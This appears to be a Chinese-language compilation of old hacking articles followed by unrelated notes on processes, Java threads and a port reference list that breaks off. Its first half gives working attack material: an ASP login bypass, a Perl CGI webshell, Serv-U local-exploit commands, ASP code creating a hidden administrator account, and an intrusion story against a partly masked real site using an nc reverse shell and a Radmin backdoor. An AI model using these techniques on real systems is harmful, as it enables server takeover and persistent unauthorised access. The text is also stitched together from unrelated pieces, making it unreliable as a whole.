set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>

啊，有容错语句不能暴库！等等，如果提交%5c数据库找不到，由于容错，所以程序会继续执行，那么说来从数据库得到的用户名密码皆为空（想想有时暴库失败是不是看到空空的框架，因为数据都是空嘛），哈哈，这样我们就绕过验证了！

知道怎么做了吧，把登陆页面保存到本地，修改提交的url，把最后一个/改成%5c，用户名密码用空格（有的程序会检查用户名密码是否为空，空格会被程序过滤），提交，就ok了。

诶，各位不要以为我自己没事写段代码来捣鼓，实际上这个是我们学校一个高手做的留言板程序，就挂在学校的主页，呵呵。

既然弄懂了原理，当然要找实际漏洞啦，自然是拿大名鼎鼎的"洞"网论坛开刀。不过失败了，因为它的数据库连接文件里有这么一段：

If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错，请检查连接字串。"
Response.End
End If

数据库找不到程序就结束了，呵呵，空欢喜一场。

接着又去down了bbsxp论坛，打开数据库连接文件，晕，根本没有容错语句；呵呵，不过可以暴库哦。

我又不是BT，所以不去找事了，写篇文章，算是给各位高手提供资料吧。

总结一下这个攻击方法成功的条件：1、数据库连接用的相对路径且仅有简单的容错语句；2、服务器iis版本为4或5；3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格；4、程序不能在一级目录

至于防范，呵呵，既然攻击条件知道了，防范措施自然也出来了^_^


提升权限终极技巧 作者：WekweN http://www.wrsky.com

本篇文章结合了许多高手提升权限的技巧和自己的一些想法

当我们取得一个webshell时候，下一部要做的就是提升权限

个人总结如下：
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆
ps: 破解工具本站已提供。请自己Search一下！

2.C:\WINNT\system32\config进这里下它的SAM，破解用户的密码
用到破解sam密码的软件有LC，SAMinside

3.C:\Documents and Settings\All Users\「开始」菜单\程序看这里能跳转不，我们从这里可以获取好多有用的信息
可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转
进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限


4.c:\winnt\system32\inetsrv\data就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行

5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "

\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n

\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行，可以试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 http://anyhost//cmd.pl?dir
显示"拒绝访问"，表示可以执行了！马上提交：先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回：
Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限，提交：
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息，就表示成功了
Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[+] Domain xl:2 created

[+] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员：

http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"


6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升，好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","WekweN$")
od.SetPassword "WekweN" <-----密码
od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"
"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\Program Files\Java Web Start这里如果可以，一般很小，可以尝试用jsp的webshell，听说权限很小，本人没有遇见过。

9.最后了，如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs等木马。

等到主机重启或者你ddos逼它重启，来达到权限提升的目的。


总结起来说就是，找到有执行和写入的目录，管他什么目录，然后上传提升工具，最后执行，三个字"找" "上""执"

以上是本人的拙见，大家有什么好的方法多多分享
WekweN
04.12.12


如何绕过防火墙提升权限


本文讲的重点是webshell权限的提升和绕过防火墙，高手勿笑。

废话少说，咱们进入正题。

首先确定一下目标：http://www.sun***.com ，常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell，不是DVBBS，而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp，用过动鲨的door.exe的人都知道，这个是上传asp木马内容的。于是，上传海洋2005a，成功获得webshell。

测试一下权限，在cmd里运行set，获得主机一些信息，系统盘是D盘，也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢？难道是双系统？浏览后发现没有什么系统文件，只有一些垃圾文件，晕死。没关系，再来检查一下，虚拟主机都有serv-u的，这台也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。

思路：上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用（反正我总遇到这个问题），没关系，用rain改的一个无组件上传，一共有3个文件，up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹，up.htm是本地用的，修改up.htm里的链接地址为：http://www.sun***.com/lemon/upload.asp就可以上传了。

传上了srv.exe和nc.exe在H:\long\sun***\lemon（网站目录）后，发现没有运行权限。没关系，根据经验，一般系统下D:\Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去，但是发现我们的webshell没有对D盘写的权限，晕死。

可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改，难道要破解serv-u的密码，晕，不想。

不可以这么就泄气了，我突然想到为什么系统不放在C盘了，难道C盘是FAT32分区的？（后来证明了我们的想法。这里说一下，如果主机有win98的系统盘，那里99%是FAT32分区的。我们还遇到过装有Ghost的主机，为了方便在DOS下备份，它的备份盘一般都是FAT分区的。）如果系统盘是FAT32分区，则网站就没有什么安全性可言了。虽然C盘不是系统盘，但是我们有执行权限。呵呵，copy srv.exe和nc.exe到c:\，运行 srv.exe "nc.exe -e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡，在这之前我们已经在肉鸡上运行了nc -l -p 888。我们在学校内网里，没有公网ip，不爽-ing。

我们成功获得一个系统shell连上肉鸡。（看起来简单，其实这里我们也遇到过挫折，我们发现有些版本的nc居然没有-e这个参数，还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功，会出现乱码，没办法用。为此，上传n次，错误n次，傻了n次，后来终于成功了。做黑客还真得有耐心和恒心。）

高兴之余，我们仍不满足，因为这个shell实在是太慢了。于是，想用我们最常用的Radmin，其实管理员一按Alt+Ctrl+Del，看进程就能发现r_server了，但是还是喜欢用它，是因为不会被查杀。好了，上传admdll.dll，raddrv.dll，r_server.exe到H:\long\sun***\lemon，再用刚才nc得到的shell把它们copy到d:\winnt\system32\下，分别运行：r_server /install , net start r_server , r_server /pass:rain /save 。

一阵漫长的等待，终于显示成功了。兴冲冲用radmin连上去，发现连接失败。晕死，忘了有防火墙了。上传pslist和pskill上去，发现有backice，木马克星等。Kill掉他们虽然可以登陆，但服务器重启后还是不行，终不是长久之计呀。防火墙是不防21，80等端口的，于是，我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来，覆盖本机的ServUDaemon.ini，在本机的serv-u上添加一个用户名为xr，密码为rain的系统帐号，加上所有权限。再用老办法，上传，用shell写入D:\program files\serv-u\里，覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间，但是成功了，于是用flashfxp连上，发生530错误。郁闷，怎么又失败了。（根据经验这样应该就可以了，但为什么不行没有想通，请高手指点。）

不管了，我们重启serv-u就ok了，怎么重启呢，开始想用shutdown重启系统，但那样我们就失去了nc这个shell，还可能被发现。后来，眼睛一亮，我们不是有pskill吗？刚才用pslist发现有这个进程：ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ，这里要注意不是ServUDaemon.exe 。

好了，到这里，我们直接ftp上去吧，ls一下，哈哈，系统盘在我的掌握下。我们能不能运行系统命令呢？是可以的，这样就可以：

ftp>quote site exec net user xr rain /add

在webshell上运行net user，就可以看见添加成功了。

整个入侵渗透到这就结束了，在一阵后清理打扫后。我们就开始讨论了。其实，突破防火墙有很多好的rootkit可以做到的，但是我们觉得系统自带的服务才是最安全的后门。


winNT/2000提升权限

　　Windows NT/2000 通用的提升方法

　　攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组，这样攻击者就控制了该计算机系统。这主要有以下几种方法：1.获得管理员密码，下次就可以用该密码进入系统； 2. 先新建一个用户，然后把这个普通添加到管理员组，或者干脆直接把一个不起眼的用户如guest 添加到管理员组； 3. 安装后门。

进程（在很多操作系统中也称为任务）是操作系统中的一个十分重要的概念。什么是进程呢？所谓进程是指程序的一次执行过程，在Windows95中，就是一个EXE文件的执行过程。但是应该注意，进程和程序是两个不同的概念，不能等同。程序是一组指令的有序集合，是静态的；进程则是指一组指令序列在处理机上的一次执行过程，是动态的。严格地说，进程是程序在一个数据集合上的运行过程，它具有动态、并行、独立、异步等特性；一个进程由“创建”而产生、由调度而进入执行、在资源不能满足时被“挂起”、由“撤销”而消亡，因此，进程是有生命的。当然，一个进程将唯一地对应于一个EXE文件。程序和进程的关系还可以打个比方，如果把程序看作一支曲谱，进程可以理解为对这支曲谱的演奏过程。当然，这个比方并不准确，但可以帮助理解程序和进程之间的关系。
　　在Windows95中还采用了线程的概念，所谓线程是指由进程进一步派生出来的一组代码（指令组）的执行过程。一个进程可以产生多个线程，这些线程都共享该进程的地址空间，它们可以并行、异步地执行。采用线程最主要的好处是：使同一个程序能有几个并行执行的路径，提高了执行速度；线程需要的系统开销比进程要小。应该说明的是，在Windows95中，“多任务”是基于线程而不是基于进程。
　　多任务执行是指在同一台计算机系统的同一时刻运行多个程序。由于允许活动任务和后台任务同时运行，所以可以做到有一个任务在后台执行时，前台又能干另一件事。比如说，我们可以一边用图文处理程序编辑一个文件，一边让打印程序完成打印工作。这就极大地提高了工作效率，因为大多数用户都确实需要同时对几个不同的应用程序进行工作。
　　在Windows 3.X中，多个应用程序同时运行是采取一种所谓的“协作式”方式，称为“协作式多任务”。“协作”这个用语意味着多个应用程序之间必须相互协调，依次实现对操作系统的控制。它们并不是真正的多任务执行，因为其中还有多任务共享系统资源的问题。为了让操作系统把控制权从一个程序转换到另一个程序，当前活动的程序就必须周期地检查一个消息队列。如果某个程序不能经常检查消息队列，操作系统就不能实现控制权的转移。
　　在Windows 95中采用了一种所谓带优先权的多任务方式来运行基于Win32（Windows的32位）应用程序，称为“抢先式多任务”。在这种方式下，操作系统可以在需要时中断当前的任务，再按照任务队列中各个任务的优先级别来进行任务的调度。为兼容起见，基于Win16（Windows的16位）应用程序仍采用协作式方式完成多任务执行。在Windows 3.X的协作式多任务环境中，必须在Windows 3.X“控制面板”中386增强模式实用程序的一个对话框中才能设置任务的优先级。而Windows 95则在缺省情况下就是完全带优先级的，所以不需要手工对优先级加以设置，这个任务由Windows 95在后台透明地加以完成。
　　Windows 95抢先式多任务执行实际上就是抢先式多线程执行。为了抢先式多线程执行实现，每个线程有一个优先级值，范围是从0到31。优先级0最低，保留给系统使用。优先级1到31分成四类：空闲（1－6），正常（5－11），高（11－15）和实时（16－31）。正常分类又进一步分成二级：后台（5－9）和前台（6－11）。注意这些范围是有重叠的。这样做可使调度更灵活，例如，允许某些后台任务比某些前台任务更重要，尽管在通常情况下，前台任务的优先级应该更高。使用实时优先级时要非常当心。如果你把一个任务的优先级设得太高，也可能无法实现多任务执行功能。这是因为一个任务的优先级太高了，它就完全不允许系统中有其他任务运行。
　　VMM（虚拟机管理程序）负责在分时抢先的环境里调度各个进程和线程，具体包括以下服务：生成线程、管理线程、撤消线程和线程调度。
　　VMM中有两个调度程序：主调度程序和时间片调度程序。主调度程序负责确定最高优先级的线程。只有最高优先级的线程才会运行，其他优先级较低的都被封锁；时间片调度程序负责为所有具有最高优先级的可运行任务分配时间片。
　　系统运行过程中，线程的优先级可由系统或设备驱动程序（或两者）改变。例如，一旦中断产生，则处理这个中断的线程优先级临时提高，以便它立即得到时间来处理该中断。完成后，优先级可以再降低。
　　在抢先式多任务中，基于Win32的应用程序不必让位给其它程序就能以友好的方式实现多任务。操作系统会根据系统的需要把控制权交给某个运行中的任务，或从某个运行中的任务移走控制权。这才是真正的多任务操作系统。

线程是程序中一个单一的顺序控制流程.在单个程序中同时运行多个线程完成不同的工作,称为多线程.
线程和进程的区别在于,子进程和父进程有不同的代码和数据空间,而多个线程则共享数据空间,每个线程有自己的执行堆栈和程序计数器为其执行上下文.多线程主要是为了节约CPU时间,发挥利用,根据具体情况而定.
线程的周期
新建 就绪 运行 阻塞 死亡
线程调度与优先级
有线程进入了就绪状态,需要有线程调度程序来决定何时执行,根据优先级来调度.
线程组
每个线程都是一个线程组的一个成员,线程组把多个线程集成一个对象,通过线程组可以同时对其中的多个线程进行操作.在生成线程时必须将线程放在指定的线程组,也可以放在缺省的线程组中,缺省的就是生成该线程的线程所在的线程组.一旦一个线程加入了某个线程组,不能被移出这个组.
守护线程
是特殊的线程,一般用于在后台为其他线程提供服务.
isDaemon():判断一个线程是否为守护线程.
set Daemon():设置一个线程为守护线程.
Thread类和Runnable接口
Thread类
类Thread在包java.lang中定义,它的构造方法如下:
public Thread();
public Thread(Rannable target);
public Thread(Rannable target,String name);
public Thread(String name);
public Thread(ThreadGroup group,Rannable target);
public Thread(ThreadGroup group, String name);
主要方法
isActive() 判断是否处于执行状态
Suspend() 暂停执行
reSume 恢复执行
start() 开始执行
Stop() 停止执行
sleep() 睡眠
run() 程序体
yield() 向其他线程退让运行权
线程优先级
Public statuc final int MAX_PRIORITY最高优先级,10
Public statuc final int MIN_PRIORITY最低优先级,1
Public statuc final int NORM_PRIORITY普通优先级,5
Runnable接口
Runnable接口中只定义了一个方法run()作为线程体,
void run()

进程是什么
　　进程为应用程序的运行实例，是应用程序的一次动态执行。看似高深，我们可以简单地理解为：它是操作系统当前运行的执行程序。在系统当前运行的执行程序里包括：系统管理计算机个体和完成各种操作所必需的程序；用户开启、执行的额外程序，当然也包括用户不知道，而自动运行的非法程序（它们就有可能是病毒程序）。
　　危害较大的可执行病毒同样以“进程”形式出现在系统内部（一些病毒可能并不被进程列表显示，如“宏病毒”），那么及时查看并准确杀掉非法进程对于手工杀毒有起着关键性的作用

端口概念
　　在网络技术中，端口（Port）大致有两种意思：一是物理意义上的端口，比如，ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口，如RJ-45端口、SC端口等等。二是逻辑意义上的端口，一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的端口。


　　查看端口
　　在Windows 2000/XP/Server 2003中要查看端口，可以使用Netstat命令：
　　依次点击“开始→运行”，键入“cmd”并回车，打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”，按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。

　　关闭/开启端口
　　在介绍各种端口的作用前，这里先介绍一下在Windows中如何关闭/打开端口，因为默认的情况下，有很多不安全的或没有什么用的端口是开启的，比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性，我们可以通过下面的方法来关闭/开启端口。

　　关闭端口
　　比如在Windows 2000/XP中关闭SMTP服务的25端口，可以这样做：首先打开“控制面板”，双击“管理工具”，再双击“服务”。接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol （SMTP）”服务，单击“停止”按钮来停止该服务，然后在“启动类型”中选择“已禁用”，最后单击“确定”按钮即可。这样，关闭了SMTP服务就相当于关闭了对应的端口。

　　开启端口
　　如果要开启该端口只要先在“启动类型”选择“自动”，单击“确定”按钮，再打开该服务，在“服务状态”中单击“启动”按钮即可启用该端口，最后，单击“确定”按钮即可。
　　提示：在Windows 98中没有“服务”选项，你可以使用防火墙的规则设置功能来关闭/开启端口。
　　端口分类

　　逻辑意义上的端口有多种分类标准，下面将介绍两种常见的分类：

　　1. 按端口号分布划分

　　（1）知名端口（Well-Known Ports）
　　知名端口即众所周知的端口号，范围从0到1023，这些端口号一般固定分配给一些服务。比如21端口分配给FTP服务，25端口分配给SMTP（简单邮件传输协议）服务，80端口分配给HTTP服务，135端口分配给RPC（远程过程调用）服务等等。

　　（2）动态端口（Dynamic Ports）
　　动态端口的范围从1024到65535，这些端口号一般不固定分配给某个服务，也就是说许多服务都可以使用这些端口。只要运行的程序向系统提出访问网络的申请，那么系统就可以从这些端口号中分配一个供该程序使用。比如1024端口就是分配给第一个向系统发出申请的程序。在关闭程序进程后，就会释放所占用的端口号。
　　不过，动态端口也常常被病毒木马程序所利用，如冰河默认连接端口是7626、WAY 2.4是8011、Netspy 3.0是7306、YAI病毒是1024等等。

　　2. 按协议类型划分
　　按协议类型划分，可以分为TCP、UDP、IP和ICMP（Internet控制消息协议）等端口。下面主要介绍TCP和UDP端口：

　　（1）TCP端口
　　TCP端口，即传输控制协议端口，需要在客户端和服务器之间建立连接，这样可以提供可靠的数据传输。常见的包括FTP服务的21端口，Telnet服务的23端口，SMTP服务的25端口，以及HTTP服务的80端口等等。

　　（2）UDP端口
　　UDP端口，即用户数据包协议端口，无需在客户端和服务器之间建立连接，安全性得不到保障。常见的有DNS服务的53端口，SNMP（简单网络管理协议）服务的161端口，QQ使用的8000和4000端口等等。
　　常见网络端口

　　网络基础知识!端口对照

　　端口：0
　　服务：Reserved
　　说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

　　端口：1
　　服务：tcpmux
　　说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

　　端口：7
　　服务：Echo
　　说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。

　　端口：19
　　服务：Character Generator
　　说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

　　端口：21
　　服务：FTP
　　说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

　　端口：22
　　服务：Ssh
　　说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。

　　端口：23
　　服务：Telnet
　　说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

　　端口：25
　　服务：SMTP
　　说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

　　端口：31
　　服务：MSG Authentication
　　说明：木马Master Paradise、Hackers Paradise开放此端口。

　　端口：42
　　服务：WINS Replication
　　说明：WINS复制

　　端口：53
　　服务：Domain Name Server（DNS）
　　说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

　　端口：67
　　服务：Bootstrap Protocol Server
　　说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

　　端口：69
　　服务：Trival File Transfer
　　说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。

　　端口：79
　　服务：Finger Server
　　说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。

　　端口：80
　　服务：HTTP
　　说明：用于网页浏览。木马Executor开放此端口。

　　端口：99
　　服务：Metagram Relay
　　说明：后门程序ncx99开放此端口。

　　端口：102
　　服务：Message transfer agent(MTA)-X.400 over TCP/IP
　　说明：消息传输代理。

　　端口：109
　　服务：Post Office Protocol -Version3
　　说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

　　端口：110
　　服务：SUN公司的RPC服务所有端口
　　说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

　　端口：113
　　服务：Authentication Service
　　说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。

　　端口：119
　　服务：Network News Transfer Protocol
　　说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。

　　端口：135
　　服务：Location Service
　　说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。

　　端口：137、138、139
　　服务：NETBIOS Name Service
　　说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

　　端口：143
　　服务：Interim Mail Access Protocol v2
　　说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。

　　端口：161
　　服务：SNMP
　　说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

　　端口：177
　　服务：X Display Manager Control Protocol
　　说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。

　　端口：389
　　服务：LDAP、ILS
　　说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

　　端口：443
　　服务：Https
　　说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。

　　端口：456
　　服务：[NULL]
　　说明：木马HACKERS PARADISE开放此端口。

　　端口：513
　　服务：Login,remote login
　　说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

　　端口：544
　　服务：[NULL]
　　说明：kerberos kshell

　　端口：548
　　服务：Macintosh,File Services(AFP/IP)
　　说明：Macintosh,文件服务。

　　端口：553
　　服务：CORBA IIOP （UDP）
　　说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

　　端口：555
　　服务：DSF
　　说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

　　端口：568
　　服务：Membership DPA
　　说明：成员资格 DPA。

　　端口：569
　　服务：Membership MSN
　　说明：成员资格 MSN。

　　端口：635
　　服务：mountd
　　说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。

　　端口：636
　　服务：LDAP
　　说明：SSL（Secure Sockets layer）

　　端口：666
　　服务：Doom Id Software
　　说明：木马Attack FTP、Satanz Backdoor开放此端口

　　端口：993
　　服务：IMAP
　　说明：SSL（Secure Sockets layer）

　　端口：1001、1011
　　服务：[NULL]
　　说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。

　　端口：1024
　　服务：Reserved
　　说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。

　　端口：1025、1033
　　服务：1025：network blackjack 1033：[NULL]
　　说明：木马netspy开放这2个端口。

　　端口：1080
　　服务：SOCKS
　　说明：这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。

　　端口：1170
　　服务：[NULL]
　　说明：木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。

　　端口：1234、1243、6711、6776
　　服务：[NULL]
　　说明：木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。

　　端口：1245
　　服务：[NULL]
　　说明：木马Vodoo开放此端口。

　　端口：1433
　　服务：SQL
